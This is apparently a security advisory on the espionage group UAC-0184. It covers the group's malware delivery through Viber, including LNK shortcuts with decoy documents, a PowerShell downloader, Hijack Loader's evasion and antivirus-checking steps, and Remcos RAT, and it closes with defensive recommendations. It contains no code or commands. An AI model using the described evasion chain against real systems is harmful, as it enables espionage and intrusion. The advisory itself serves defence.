State-Aligned Espionage Group Expands Messaging-App Malware Delivery Tactics

Threat actors shift from email to messaging platforms to improve stealth and success rates

Severity

HIGH — Targeted Espionage / Malware Delivery

Technical Overview

Threat intelligence researchers have identified continued espionage activity by the Russia-aligned threat group UAC-0184, also tracked as Hive0156. The group actively targets military and government environments using evolving delivery techniques.

While earlier campaigns relied heavily on phishing emails, recent operations show a deliberate shift toward messaging platforms, with Viber now serving as a primary delivery channel. This evolution allows attackers to bypass traditional email security controls and exploit user trust in real-time communication tools.

The group has remained highly active and focused on intelligence collection rather than rapid disruption.

Evolution of Attack Tactics

UAC-0184 first came to public attention in early 2024 after multiple campaigns against government-related entities. Historically, the group favored war-themed email lures to distribute Hijack Loader, which then deployed Remcos RAT as the final payload.

Over time, researchers observed a gradual transition away from email. The attackers began abusing Signal and Telegram, and the latest activity confirms Viber as an additional delivery vector. This shift demonstrates a clear attempt to increase reach and reduce detection.

Attack Chain and Malware Delivery

The attack begins with a message sent through Viber that contains a malicious ZIP archive. The archive includes multiple Windows shortcut (LNK) files disguised as legitimate Microsoft Word or Excel documents.

When a victim opens one of the shortcuts, two actions occur simultaneously. First, the file displays a decoy document to reduce suspicion. Second, it silently launches a PowerShell-based routine that downloads a secondary archive from attacker-controlled infrastructure.

This secondary archive contains components required to assemble Hijack Loader, which executes directly in memory to avoid leaving artifacts on disk.

Loader Behavior and Evasion Techniques

Hijack Loader uses a multi-stage execution process designed to evade endpoint detection. It leverages advanced techniques such as DLL side-loading and module stomping to remain hidden.

Before deploying the final payload, the loader surveys the infected system. It checks for installed security products by calculating CRC32 hashes associated with well-known security vendors, including endpoint protection and antivirus software.

The loader also establishes persistence using scheduled tasks and applies obfuscation techniques to bypass static detection mechanisms.

Final Payload and Capabilities

After completing its checks, the loader injects Remcos RAT into a legitimate process. This technique allows the malware to blend into normal system activity.

Once active, Remcos provides attackers with full remote access to the compromised endpoint. Capabilities include command execution, file management, activity monitoring, and data exfiltration. The attackers can operate through a graphical control interface, enabling both automated and manual interaction with victim systems.

Key Risk

• Messaging platforms bypass traditional email defenses
• Decoy documents reduce user suspicion
• In-memory execution limits forensic visibility
• Remote administration tools enable long-term surveillance

Recommended Defensive Actions

• Treat messaging platforms as potential malware delivery channels
• Block execution of LNK files from untrusted archives
• Monitor PowerShell usage and abnormal process injection
• Enforce strict application and script controls
• Educate users about phishing risks beyond email